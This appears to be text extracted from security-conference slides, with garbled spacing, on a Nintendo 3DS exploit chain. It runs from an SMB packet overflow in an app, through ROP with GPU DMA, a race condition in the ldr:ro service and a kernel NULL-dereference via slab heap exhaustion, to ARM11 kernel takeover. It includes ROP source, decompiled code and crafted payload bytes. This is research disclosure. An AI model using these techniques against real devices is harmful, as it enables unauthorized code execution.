00$00$00$00$00$00$00$00$
00$00$EC$0F$B8$92$03$00$
0C$FF$00$00$00$04$41$0A$
00$01$00$00$00$00$00$AC$
00$00$00$00$00$54$00$00$
80$B1$00$4E$54$4C$4D$53$
53$50$00$03$00$00$00$18$
00$18$00$40$00$00$00$10$
00$10$00$58$00$00$00$10"
0C"10"0C$9A$00$00$00$08$
00$08$00$70$00$00$00$12$
00$12$00$78$00$00$00$10$
00$10$00$8A$00$00$00$15$
82$8A$E0$46$0C$DE$96$3A$
91$C2$18$00$00$00$00$00$
00$00$00$00$00$00$00$00$
00$00$00$16$A4$D8$FD$7C$
4B$EB$44$8C$D1$0C$3B$25$
B9$A8$2A$66$94$76$73$69$
A5$E0$2E$55$00$73$00$65$
00$72$00$4C$00$4F$00$43$
00$41$00$4C$00$48$00$4F$
00$53$00$54$00$17$87$6C$
C8$49$39$CC$89$26$68$2F$
90$BA$8A$3D$45$57$00$4F$
00$52$00$4B$00$47$00$52$
00$4F$00$55$00$50$00$00$
00$00$00$00$00$00$00$00$
$$$$$$$$$$...$
0x0000:$SMB(magic(number(
0x0004:$SMB(command((0x73:(Session(Setup(AndX)(
$...(
0x002F:$Security(blob(size((0xAC(bytes)(
$...(
0x003B:$Security(blob(magic(number(
$...(
0x0057:$Domain(name(data(descriptor(
$$0x00:$Data(length((0xC10$>$0x20)(
$$0x02:$Maximum(data(length((0xC10$>$0x20)(
$$0x04:$Data(offset((0x9A)(
$...(
0x00AB:$Stack(smash(overwrite(payload((0xC10(bytes)(
$...(
0x0057:$NTLM(response(data(descriptor(
$$0x00:$Data(length((0x10$!=$0x18)(
$$0x02:$Maximum(data(length((0x10$!=$0x18)(
$$0x04:$Data(offset((0x9A)(
Exploitable vuln: corrupted packet
Code execution?
• Strict(DEP(–(OS(never(allocates(RWX(memory(in(user-mode(
• Only(2(system(modules(can(create(more(executable(memory(
• loader:(loads(main(process(binaries(
• ro:(loads(dynamic(libraries((CROs(–(think(DLL(equivalent(for(3DS)(
• But(what(if(we(don’t(need(more(executable(memory…?(
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
Physical memory region separation
MCOPY(
SYSTEM( BASE(
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
GPU DMA
SYSTEM( BASE(
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
MCOPY(
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
GPU DMA: range reduction mitigation
SYSTEM( BASE(
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
MCOPY(
FCRAM
Using DMA to achieve code execution
mcopy
0x00100000$
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
0x001B9000$
0x001E0000$
0x001E0000$
.rodata
.data
.text
Virtual Addressing
Physical Addressing
FCRAM
Nintendo’s mitigation: PASLR
mcopy
0x00100000$
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
0x001B9000$
0x001E0000$
0x001E0000$
.rodata
.data
.text
Virtual Addressing
Physical Addressing
Bypassing PASLR in ROP
rop:$
$$gspwn$MCOPY_RANDCODEBIN_COPY_BASE,$MCOPY_RANDCODEBIN_BASE,$MCOPY_CODEBIN_SIZE$
$
$$str_val$MCOPY_SCANLOOP_CURPTR,$MCOPY_RANDCODEBIN_COPY_BASE$-$MCOPY_SCANLOOP_STRIDE$
$
$$scan_loop:$
$$$$ldr_add_r0$MCOPY_SCANLOOP_CURPTR,$MCOPY_SCANLOOP_STRIDE$
$$$$str_r0$MCOPY_SCANLOOP_CURPTR$
$
$$$$cmp_derefptr_r0addr$MCOPY_SCANLOOP_MAGICVAL,$scan_loop,$scan_loop_pivot_after$
$
$$$$str_r0$scan_loop_pivot$+$4$
$$$
$$$$scan_loop_pivot:$
$$$$jump_sp$0xDEADBABE$
$$$$scan_loop_pivot_after:$
$
$$memcpy$MCOPY_RANDCODEBIN_COPY_BASE,$initial_code,$initial_code_end$-$initial_code$
$
$$flush_dcache$MCOPY_RANDCODEBIN_COPY_BASE,$0x00100000$
$
$$gspwn_dstderefadd$(MCOPY_RANDCODEBIN_BASE)$-$(MCOPY_RANDCODEBIN_COPY_BASE),$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$MCOPY_SCANLOOP_CURPTR,$MCOPY_RANDCODEBIN_COPY_BASE,$0x800,$0$
$
$$.word$MCOPY_SCANLOOP_TARGETCODE$
$
.align$0x4$
$$initial_code:$
$$$$.incbin$"../build/mhax_code.bin"$
$$initial_code_end:$
DMA(PASLRed(code(data(
to(CPU-readable(location(
for(u32*$ptr$=$MCOPY_RAND_COPY_BASE;$
$$$$*ptr$!=$magic_value;$
$$$$ptr$+=$MCOPY_SCANLOOP_STRIDE/4);$
DMA(code(to(known(VA(
and(jump(to(it((
Insert(short(video(showing(hbmenu(booting(from(mhax(
ARM11 Kernel
Home Menu
loader
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
mcopy
User-mode application compromised!
Escalating privilege
We’re in! …now what?
Where do we stand?
• mcopy(is(just(an(app(
• It(only(has(access(to(basic(system(calls(
• It(only(has(access(to(a(few(services(
• Paths(to(exploitation(
• Directly(attack(the(ARM9:(difficult(without(access(to(more(services(
• Attack(the(ARM11(kernel:(definitely(possible(but(easier(with(more(system(
calls(
• Attack(other(user-mode(processes(
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
GPU DMA: range reduction mitigation
SYSTEM( BASE(
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
MCOPY(
Memory
CPUs
Devices
ARM9(
ARM11(
GPU(
CRYPTO(
NAND(
GPU DMA range reduction: I lied
FCRAM(
K/P9(
Kernel11(
WRAM(
VRAM(
ARM9(
internal(
MCOPY(
SYSTEM( BASE(
mcopy heaps
Home
menu
code
Home menu
heaps
mcopy code
FCRAM
FCRAM and GPU DMA
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Physical Addressing
GPU(DMA(accessible(
Not(GPU(DMA(accessible(
Taking over home menu
• GPU(DMA(allows(us(to(read/write(home(menu’s(heap(
=>(Find(an(interesting(object,(corrupt(it(and(jump(back(to(home(menu(
(
• Can’t(use(GPU(DMA(to(get(code(execution(under(home(menu(
=>(Write(a(service(in(ROP(that(runs(under(home(menu(to(give(apps(
access(to(its(privileges(
Side note: GPU DMA range mitigation
• Nintendo’s(idea(
• Different(processes(need(different(GPU(DMA(range(
• For(example,(apps(never(need(to(DMA(to/from(home(menu(
• So(why(not(restrict(app/game’s(DMA(more(than(home(menu’s?(
• Implemented(in(11.3.0-36,(released(on(February(6th(2017(
• Bypassed(on(New(3DS(on(February(10th(
• The(problem:(the(DMA(restriction(doesn’t(cover(home(menu’s((whole(heap(
ARM11 Kernel
Home Menu
loader
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
mcopy
Home menu compromised, giving access to more services
Home menu’s privileges
• Access(to(the(ns:s(service(
• NS:(Nintendo(Shell(
• Allows(us(to(kill(and(spawn(processes(at(will(
⇒ (We(can(access(any(service(accessible(from(an(app(
• Use(ns:s(to(spawn(the(app(
• Use(GPU(DMA(to(overwrite(its(code(and(take(it(over(
• Access(the(service(from(that(app(
(
-(
ldr:ro
• Service(provided(by(the(“ro”(process(
• Handles(loading(dynamic(libraries:(CROs(
• Basically(like(DLLs(for(the(3DS(
• Is(the(only(process(to(have(access(to(certain(system(calls(
• Most(interesting(one:(svcControlProcessMemory(
• Lets(you(allocate/reprotect(memory(as(RWX(
• Useful(for(homebrew(among(other(things…(
(
-(
CRO buffer
CRO buffer
FCRAM
ldr:ro: first, application loads CRO into an RW buffer
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
Loaded(CRO(
CRO buffer
CRO buffer
Loaded CRO
FCRAM
ldr:ro: second, CRO is locked for the app and mapped to its load address
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
Loaded(CRO(
Loaded CRO
CRO buffer
CRO buffer
FCRAM
ldr:ro: third, ro creates a local view of the CRO in its own memory space
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
Loaded(CRO(
Loaded CRO
CRO buffer
CRO buffer
FCRAM
ldr:ro: fourth, ro performs processing on CRO (relocations, linking etc)
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
CRO buffer
CRO buffer
FCRAM
ldr:ro: finally, ro unmaps the CRO and reprotects the app’s loaded view
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
Loaded CRO
CRO buffer
Loaded(CRO(
Loaded CRO
CRO buffer
FCRAM
Key insight: app can’t modify CRO from CPU, but can with GPU
app
0x20000000$
0x30000000$
APPLICATION
BASE
SYSTEM
0x27C00000$
0x2E000000$
Virtual Addressing
Physical Addressing
ro
GPU(DMA(accessible(
Not(GPU(DMA(accessible(
CRO tampering with GPU
• Nintendo’s(CRO(loader(is(written(with(this(in(mind(
• Lots(of(checks(to(prevent(malformed(CROs(from(compromising(ro(process(
• However,(Nintendo(didn’t(account(for(modifying(CRO(*during*(
processing(
• Lots(of(possible(race(condition(bugs!(
• Using(GPU(DMA(for(time-critical(memory(modification(is(tricky,(
especially(with(cache(in(the(middle(
• Kernel(prevents(us(from(double-mapping(the(CRO(memory…(
• …in(theory(
(
-(
Heap segment 1
Heap segment 1
Heap segment 2
Heap segment 2
FCRAM
Kernel keeps physical heap metadata in free physical memory blocks
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
Free block
Free
block
Heap segment 1
Heap segment 1
Heap segment 2
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
Free block
Free
block
The metadata is essentially just a linked list
Heap segment 3
Heap segment 1
Heap segment 1
Heap segment 2
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
Free block
Free
block
When allocating a new heap segment, the kernel just walks the list
?"
Heap segment 1 Heap segment 3
Heap segment 1
Heap segment 3
Heap segment 2
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
Free block
Free
block
GPU(DMA(accessible(
Again: app can’t modify heap metadata from CPU, but can with GPU
Heap metadata authentication
• Nintendo(knows(kernel-trusted(DMA-able(heap(metadata(is(bad(
• Introduced(a(MAC(into(the(metadata(with(a(key(only(known(to(kernel(
• Prevents(forgery(of(arbitrary(heap(metadata(blocks…(
• …(but(not(replay(attacks(
(
-(
Heap segment 2
Heap segment 1
Heap segment 1
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
A
Free block
Free block B
Creating a double mapping: initial layout
Heap segment 2
Heap segment 1
Heap segment 1
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
A
Free block
Free block B
Creating a double mapping: save free block A and B’s data through DMA
Heap segment 1
Primary mapping
Heap segment 2
Heap segment 1
Heap segment 3
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
A’
Free block
Creating a double mapping: allocate segment to fit in B but not A
Heap segment 1
Primary mapping
Heap segment 2
Heap segment 1
Heap segment 3
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
A
Free block
Creating a double mapping: use DMA to replace A’ with A
Heap segment 1
Primary mapping
Heap segment 2
Heap segment 1
Heap segment 3
Free block B
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
A
Free block
Creating a double mapping: write B’s data to heap segment 3
Primary mapping
Heap segment 1
Second mapping
Heap segment 2
Heap segment 1
Heap segment 3
Heap segment 2
FCRAM
app
0x20000000$
0x27C00000$
APPLICATION
Virtual Addressing
Physical Addressing
Free block
Creating a double mapping: allocate second mapping
Free block
A’’
ldr:ro race condition
$$...$
$
$$u32$segment_table_offset$=$*(u32*)&cro_buf[0xC8];$
$$if$($segment_table_offset$)$
$${$
$$$$void*$segment_table_ptr$=$&cro_buf[segment_table_offset];$
$
$$$$if$($is_in_cro_bounds(segment_table_ptr)$)$
$$$${$
$$$$$$*(u32*)&cro_buf[0xC8]$=$(u32)segment_table_ptr;$
$$$$}$else$goto$fail;$
$$}$
$
$$...$
$
$$u32$num_segments$=$*(u32*)&cro_buf[0xCC];$
$
$$for(int$i$=$0;$i$<$num_segments;$i++)$
$${$
$$$$cro_segment_s*$segment_table$=$*(cro_segment_s**)&cro_buf[0xC8];$
$$$$cro_segment_s*$cur_segment$=$&segment_table[i];$
$
$$$$...$
$$}$
$
$$if(!everything_ok)$throw_error(0xD9012C19);$
Relocates(offsets(as(pointers(in(the(CRO(
buffer,(after(checking(them(
ro(uses(pointers(loaded(from(the(CRO(
buffer(without(double(checking(
Attacker(may(have(time(to(modify(the(
CRO(buffer(
ldr:ro race condition
cro_segment_s*$segment_table$=$*(cro_segment_s**)&cro_buf[0xC8];$
cro_segment_s*$cur_segment$=$&segment_table[i];$
$
switch(cur_segment->id)$
{$
$$case$2:$//$CRO_SEGMENT_DATA$
$$$$if$($!cur_segment->size$)$continue;$
$$$$if$($cur_segment->size$>$data_size$)$throw_error(0xE0E12C1F);$
$$$$cur_segment->offset$=$data_adr;$
$$$$break;$
$$case$3:$//$CRO_SEGMENT_BSS$
$$$$if$($!cur_segment->size$)$continue;$
$$$$if$($cur_segment->size$>$bss_size$)$throw_error(0xE0E12C1F);$
$$$$cur_segment->offset$=$bss_adr;$
$$$$break;$
$$default:$
$$$$if(everything_ok$&&$cur_segment->offset)$
$$$${$
$$$$$$u32$cur_segment_target$=$cro_buf$+$cur_segment->offset;$
$$$$$$cur_segment->offset$=$cur_segment_target;$
$$$$$$if(cro_buf$>$cur_segment_target$
$$$$$$$$||$cro_buf_end$<$cur_segment_target)$everything_ok$=$false;$
$$$$}$
}$
if(!everything_ok)$throw_error(0xD9012C19);$
(Attacker-controlled(value((race(
condition)(
(Attacker-controlled(value((parameter)(
A."Can(write(an(arbitrary(value(to(X(if:(
- *(u8*)(X$+$8)$==$0x02$
- *(u32*)(X$+$4)$!=$0$
B.(Can(write(an(arbitrary(value(to(X(if:(
- *(u8*)(X$+$8)$==$0x03$
- *(u32*)(X$+$4)$!=$0$
C.(Can(add(a(semi-arbitrary(value(at(X(if:(
- *(u8*)(X$+$8)$not$in$[0x03,$0x02]$
- *(u32*)X$!=$0$
- Added$value$must$be$page-aligned$
Getting ROP in ro: arbitrary value write
00$C0$00$00$F0$AD$00$14$00$30$3E$00$08$80$0E$00$$
00$03$00$00$CC$63$00$14$00$00$00$00$00$00$00$00$$
F0$AD$00$14$30$3A$00$14$04$00$00$00$01$00$00$00$$
80$20$FB$1F$70$B7$00$14$00$00$00$00$70$A2$00$14$$
0C$90$00$14$00$00$00$00$01$00$00$00$B8$5C$00$14$$
00$30$3E$00$00$00$A5$00$A8$1E$12$08$00$00$00$00$$
8C$C0$00$00$34$DF$12$08$18$24$00$00$01$00$00$00$$
03$00$00$00$00$00$00$00$00$B0$83$00$00$00$00$00$$
70$B7$00$14$00$00$00$00$70$A2$00$14$0C$90$00$14$$
00$00$00$00$01$00$00$00$00$03$00$00$10$03$00$14$$
04$00$00$00$00$00$00$00$F0$AD$00$14$03$00$00$00$$
BC$90$00$14$98$90$00$14$60$A7$00$14$51$01$00$14$$
00$00$00$00$70$B7$00$14$4C$61$00$14$04$00$00$00$$
07$00$0E$00$2C$83$00$14$64$83$00$14$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$20$00$00$14$$
0FFFFF00"
0FFFFF10"
0FFFFF20"
0FFFFF30"
0FFFFF40"
0FFFFF50"
0FFFFF60"
0FFFFF70"
0FFFFF80"
0FFFFF90"
0FFFFFA0"
0FFFFFB0"
0FFFFFC0"
0FFFFFD0"
0FFFFFE0"
0FFFFFF0"
ro call stack data
Return(addresses:(what(we’d(like(to(
corrupt(
0x03(bytes(allowing(arbitrary(value(writes(
Memory(which(we(can(arbitrarily(overwrite(
…no(overlap…(
Getting ROP in ro: combined primitives
00$C0$00$00$F0$AD$00$14$00$30$3E$00$08$80$0E$00$$
00$03$00$00$CC$63$00$14$00$00$00$00$00$00$00$00$$
F0$AD$00$14$30$3A$00$14$04$00$00$00$01$00$00$00$$
80$20$FB$1F$70$B7$00$14$00$00$00$00$70$A2$00$14$$
0C$90$00$14$00$00$00$00$01$00$00$00$B8$5C$00$14$$
00$30$3E$00$00$00$A5$00$A8$1E$12$08$00$00$00$00$$
8C$C0$00$00$34$DF$12$08$18$24$00$00$01$00$00$00$$
03$00$00$00$00$00$00$00$00$B0$83$00$00$00$00$00$$
70$B7$00$14$00$00$00$00$70$A2$00$14$0C$90$00$14$$
00$00$00$00$01$00$00$00$00$03$00$00$10$03$00$14$$
04$00$00$00$00$00$00$00$F0$AD$00$14$03$00$00$00$$
BC$90$00$14$98$90$00$14$60$A7$00$14$51$01$00$14$$
00$00$00$00$70$B7$00$14$4C$61$00$14$04$00$00$00$$
07$00$0E$00$2C$83$00$14$64$83$00$14$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$20$00$00$14$$
0FFFFF00"
0FFFFF10"
0FFFFF20"
0FFFFF30"
0FFFFF40"
0FFFFF50"
0FFFFF60"
0FFFFF70"
0FFFFF80"
0FFFFF90"
0FFFFFA0"
0FFFFFB0"
0FFFFFC0"
0FFFFFD0"
0FFFFFE0"
0FFFFFF0"
ro call stack data
C.(Can(add(a(semi-arbitrary(value(at(X(if:(
- *(u8*)(X$+$8)$not$in$[0x03,$0x02]?$
- 0x8121EAE$!=$0x03$and$0x02$
- *(u32*)X$!=$0?$
- 0x3E3000$!=$0$
- Added$value$must$be$page-aligned?$
- 0xC50000$is$page-aligned$
Getting ROP in ro: combined primitives
00$C0$00$00$F0$AD$00$14$00$30$3E$00$08$80$0E$00$$
00$03$00$00$CC$63$00$14$00$00$00$00$00$00$00$00$$
F0$AD$00$14$30$3A$00$14$04$00$00$00$01$00$00$00$$
80$20$FB$1F$70$B7$00$14$00$00$00$00$70$A2$00$14$$
0C$90$00$14$00$00$00$00$01$00$00$00$B8$5C$00$14$$
00$30$03$01$00$00$A5$00$A8$1E$12$08$00$00$00$00$$
8C$C0$00$00$34$DF$12$08$18$24$00$00$01$00$00$00$$
03$00$00$00$00$00$00$00$00$B0$83$00$00$00$00$00$$
70$B7$00$14$00$00$00$00$70$A2$00$14$0C$90$00$14$$
00$00$00$00$01$00$00$00$00$03$00$00$10$03$00$14$$
04$00$00$00$00$00$00$00$F0$AD$00$14$03$00$00$00$$
BC$90$00$14$98$90$00$14$60$A7$00$14$51$01$00$14$$
00$00$00$00$70$B7$00$14$4C$61$00$14$04$00$00$00$$
07$00$0E$00$2C$83$00$14$64$83$00$14$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$20$00$00$14$$
0FFFFF00"
0FFFFF10"
0FFFFF20"
0FFFFF30"
0FFFFF40"
0FFFFF50"
0FFFFF60"
0FFFFF70"
0FFFFF80"
0FFFFF90"
0FFFFFA0"
0FFFFFB0"
0FFFFFC0"
0FFFFFD0"
0FFFFFE0"
0FFFFFF0"
ro call stack data
B.(Can(write(an(arbitrary(value(to(X(if:(
- *(u8*)(X$+$8)$==$0x03$
- 0x03$==$0x03$
- *(u32*)(X$+$4)$!=$0$
- 0x30001400$!=$0$
Getting ROP in ro: combined primitives
00$C0$00$00$F0$AD$00$14$00$30$3E$00$08$80$0E$00$$
00$03$00$00$CC$63$00$14$00$00$00$00$00$00$00$00$$
F0$AD$00$14$30$3A$00$14$04$00$00$00$01$00$00$00$$
80$20$FB$1F$70$B7$00$14$00$00$00$00$70$A2$00$14$$
0C$90$00$14$00$00$00$00$01$00$00"00"DA"DA$00$14$$
00$30$03$01$00$00$A5$00$A8$1E$12$08$00$00$00$00$$
8C$C0$00$00$34$DF$12$08$18$24$00$00$01$00$00$00$$
03$00$00$00$00$00$00$00$00$B0$83$00$00$00$00$00$$
70$B7$00$14$00$00$00$00$70$A2$00$14$0C$90$00$14$$
00$00$00$00$01$00$00$00$00$03$00$00$10$03$00$14$$
04$00$00$00$00$00$00$00$F0$AD$00$14$03$00$00$00$$
BC$90$00$14$98$90$00$14$60$A7$00$14$51$01$00$14$$
00$00$00$00$70$B7$00$14$4C$61$00$14$04$00$00$00$$
07$00$0E$00$2C$83$00$14$64$83$00$14$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$00$$
00$00$00$00$00$00$00$00$00$00$00$00$20$00$00$14$$
0FFFFF00"
0FFFFF10"
0FFFFF20"
0FFFFF30"
0FFFFF40"
0FFFFF50"
0FFFFF60"
0FFFFF70"
0FFFFF80"
0FFFFF90"
0FFFFFA0"
0FFFFFB0"
0FFFFFC0"
0FFFFFD0"
0FFFFFE0"
0FFFFFF0"
ro call stack data
B.(Can(write(an(arbitrary(value(to(X(if:(
- *(u8*)(X$+$8)$==$0x03$
- 0x03$==$0x03$
- *(u32*)(X$+$4)$!=$0$
- 0x30001400$!=$0$
ARM11 Kernel
Home Menu
loader
fs
GSP
ldr:ro
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
mcopy
ldr:ro compromised, giving access to exotic system calls
Taking over the ARM11
User mode is for losers
svcControlProcessMemory
• Privileged(system(call(
• Only(the(ro(system(module(has(access(to(it(
• Basically(svcControlMemory(but(cross-process(
• Can(allocate,(reprotect(and(remap(memory(
• Requires(a(handle(to(the(target(process(
• Less(constrained(than(svcControlMemory(
• Can(allocate(and(protect(memory(as(RWX!(
• Can(map(the(NULL(page…(
• By(design(mitigation(bypass:(allows(us(to(attack(kernel(NULL(derefs(
• What’s(an(easy(NULL-deref(target?(Allocation(code(
-(
Slab heap
Free(object(
Free(object(
Free(object(
Object(1(
Free(object(
Free(object(
Free(object(
Free(object(
Free(object(
Object(2(
Free(list(head(
• Memory(“slab”(subdivided(into(
same-size(objects(
• Objects(are(part(of(a(free(list(when(
not(in(use(
• Allocation(=(pop(from(list(
• Freeing(=(push(to(list(
• 3DS:(one(slab(per(object(type(
• *Finite*(number(of(each(type(of(
objects…(
• What(happens(if(we(run(out?(
Object(list(head(
NULL(
How are kernel objects allocated?
Slab heap allocation code
KLinkedListNode*$alloc_kobj(KLinkedListNode*$freelist_head)$
{$
$$KLinkedListNode*$ret;$
$
$$do$
$${$
$$$$ret$=$__ldrex(freelist_head);$
$$}$while(__strex(ret$?$ret->next$:$NULL,$freelist_head));$
$
$$return$ret;$
}$
Reads(the(head(of(the(free(list(
(with(synchronization)(
Pops(the(head(of(the(free(list(
(with(synchronization)(
No(further(checks(or(exception(throws(–(
alloc_kobj$returns(NULL(when(list(is(empty(
alloc_kobj uses
0xFFF0701C:$
$$v11$=$alloc_kobj(freelist_1);$
$$if$($v11$)$
$${$
$$$$...$
$$}else{$
$$$$throw_error(0xC8601808);$
$$}$
0xFFF086AC:$
$$v13$=$alloc_kobj(freelist_2);$
$$if$($v13$)$
$${$
$$$$...$
$$}else{$
$$$$throw_error(0xD8601402);$
$$}$
0xFFF22794:$
$$KLinkedListNode*$node$=$alloc_kobj(freelist_listnodes);$
$$if$($node$)$
$${$
$$$$node->next$=$0;$
$$$$node->prev$=$0;$
$$$$node->element$=$0;$
$$}$
""node->element"="...;"
svcWaitSynchronizationN
• Unprivileged(system(call(
• Takes(in(a(list(of(kernel(objects(and(waits(on(them(
• Kernel(objects(to(wait(on:(port,(mutex,(semaphore,(event,(thread…(
• Calling(Thread(goes(to(sleep(until(one(of(the(objects(signals(
• Can(wait(on(up(to(256(objects(at(a(time(
• How(does(it(keep(track(of(objects(it’s(waiting(on?(!(gabe(this(emoji(is(for(you"
(
-(
svcWaitSynchronizationN
svcWaitSynchronizationN:$
...$
$
for$($int$i$=$0;$i$<$num_kobjects;$i++$)$
{$
$$KObject*$obj$=$kobjects[i];$
$$KLinkedListNode*$node$=$alloc_kobj(freelist_listnodes);$
$
$$if$($node$)$
$${$
$$$$node->next$=$0;$
$$$$node->prev$=$0;$
$$$$node->element$=$0;$
$$}$
$
$$node->element$=$obj;$
$$thread->wait_object_list->insert(node);$
}$
$
...$
1. Create(thread(
2. Have(thread(wait(on(256(objects(
3. Have(we(dereferenced(NULL(yet?(
No?(Go(to(1.(
Yes?(We’re(done.(
How to trigger a NULL deref
ARM11 Kernel
Home Menu
loader
fs
GSP
HID
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
app
Problem 1 solution: use ns:s service to kill every process we can except our own
Note:(we(can’t(actually(kill(every(single(process(out(there(but(we(can(kill(like(90%(and(that’s(enough(
Problem 2 solution
• We’d(like(to(stop(NULL(allocations(as(soon(as(one(happens(
• We(can(detect(when(a(NULL(allocation(happens(
• Have(CPU(core(1(perform(slab(heap(exhaustion(
• Have(CPU(core(0(monitor(the(NULL(page(for(changes(
• We’ll(detect(this(assignment:(
• We(can’t(stop(new(node(allocations(from(happening…(
• …but(maybe(we(can(stop(them(from(being(NULL!(
• Have(CPU(core(0(free(some(nodes(as(soon(as(it(detects(the(NULL(allocation(
• We(can(do(this(by(signaling(an(object(that(another(thread(was(waiting(on(
$node->element$=$obj;(
Slab heap was just exhausted
Object(7(
Object(9(
Object(10(
Object(6(
Object(2(
Object(3(
Object(4(
Object(5(
Object(1(
Object(8(
Object(list(head(1(
Object(list(head(2(
NULL(
• Core(1(just(exhausted(the(linked(list(
node(slab(heap(
• Core(0(sees(a(change(on(the(NULL(page(
(
Just-in-time node freeing
nextptr$$prevptr$$objptr$$$00000000$
just(became(
00000000$00000000$00000000$00000000$
Slab heap was just exhausted
Object(7(
Object(9(
Object(10(
Object(6(
Object(8(
Object(list(head(1(
Object(list(head(2(
NULL(
• Core(1(just(exhausted(the(linked(list(
node(slab(heap(
• Core(0(sees(a(change(on(the(NULL(page(
• Core(0(calls(svcSignalEvent(to(free(a(
bunch(of(linked(list(nodes(
(
Just-in-time node freeing
nextptr$$prevptr$$objptr$$$00000000$
just(became(
00000000$00000000$00000000$00000000$
Free(object(
Free(object(
Free(object(
Free(object(
Free(object(
Free(list(head(
Slab heap was just exhausted
Object(7(
Object(9(
Object(10(
Object(6(
Object(8(
Object(list(head(1(
Object(list(head(2(
NULL(
• Core(1(just(exhausted(the(linked(list(
node(slab(heap(
• Core(0(sees(a(change(on(the(NULL(page(
• Core(0(calls(svcSignalEvent(to(free(a(
bunch(of(linked(list(nodes(
• Next(allocations(use(the(free(nodes(as(
intended(
(
Just-in-time node freeing
nextptr$$prevptr$$objptr$$$00000000$
just(became(
00000000$00000000$00000000$00000000$
Free(object(
Free(object(
Free(object(
Free(object(
Object(1(
Free(list(head(
Linked list unlinking
• When(the(NULL(node(is(unlinked,(
we(control(node->next(and(node-
>prev(
=>(We(can(write(an(arbitrary(value(to(
an(arbitrary(location(
• Has(to(be(a(writable"pointer(value…(
• But(what(to(overwrite?(
• vtable(is(used(immediately(after(
unlinking(for(an(indirect(call…(
• Difficulties(
• free_kobj(kernel(panics(on(NULL(
• Unlinking(writes(to(our(target(and(our(
value(–(so(writing(a(code(address(is(
annoying(
How do we get code execution?
KLinkedList::remove:$
...$
$
KLinkedListNode$*next$=$node->next;$
KLinkedListNode$*prev$=$node->prev;$
next->prev$=$prev;$
prev->next$=$next;$
node->next$=$0;$
node->prev$=$0;$
$
...$
...$
$
KLinkedList::remove(...);$
free_kobj(&freelist_listnodes,$node);$
((int(*)(_DWORD,$_DWORD))(vtable[9]))(...);$
$
...$
RWX NULL page linked list nodes
• Node"0"
• Next:(node(1(
• Prev:(irrelevant((unused)(
• Element:(fake(object(that(won’t(
trigger(unlinking(
• Node"1"
• Next:(node(2(
• Prev:(address(of(target(vtable(slot(
• Element:(fake(object(that(will(trigger(
unlinking(
• Node"2"
• Next:(“ldr$pc,$[pc]”(
• Prev:(irrelevant((unlink(overwrites(it)(
• Element:(address(loaded(by(“ldr$pc,$
[pc]”(
Manufacturing the linked list
00000040$C0C0C0C0$00000800$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
00000080$DFFEC6B0$00000C00$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
E59FF000$DEADBABE$00101678$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
00000000$00000000$00000000$00000000$
00000000"
00000010"
00000020"
00000030"
00000040"
00000050"
00000060"
00000070"
00000080"
00000090"
000000A0"
000000B0"
Node"1"
Node"2"
Node"0"
ARM11 Kernel
Home Menu
loader
fs
GSP
ldr:ro
System calls
APPLICATION memory region
SYSTEM memory region
BASE memory region
mcopy
ARM11 kernel compromised, and therefore all ARM11 processes as well
Taking over the ARM9
